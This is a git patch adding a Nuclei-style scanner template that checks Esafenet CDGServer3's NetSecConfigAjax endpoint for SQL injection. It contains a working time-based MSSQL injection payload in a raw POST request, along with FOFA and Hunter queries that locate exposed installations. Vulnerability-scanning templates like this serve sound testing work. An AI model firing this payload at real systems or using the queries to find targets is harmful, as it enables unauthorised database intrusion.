From 548c10c72094bedb56ef17e7bda533c3f6a0da05 Mon Sep 17 00:00:00 2001
From: r00t <24542600+adeljck@users.noreply.github.com>
Date: Wed, 24 Jul 2024 13:44:57 +0800
Subject: [PATCH] add esafenet-NetSecConfigAjax-Sqli.yaml

---
 .../esafenet-NetSecConfigAjax-Sqli.yaml       | 38 +++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml

diff --git a/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml b/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml
new file mode 100644
index 0000000000..0cc869b83a
--- /dev/null
+++ b/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml
@@ -0,0 +1,38 @@
+id: esafenet-NetSecConfigAjax-Sqli
+
+info:
+  name: Esafenet CDG NetSecConfigAjax - Sql Injection
+  author: adeljck
+  severity: high
+  description: |
+    CDGServer3 NetSecConfigAjax Interface Sql Injection.
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
+    hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/"
+    product: electronic_document_security_management_system
+    vendor: esafenet
+  tags: esafenet,sqli
+
+http:
+  - raw:
+      - |
+        POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
+
+        command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
+    max-size: 1000
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "操作成功"
+        condition: and
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file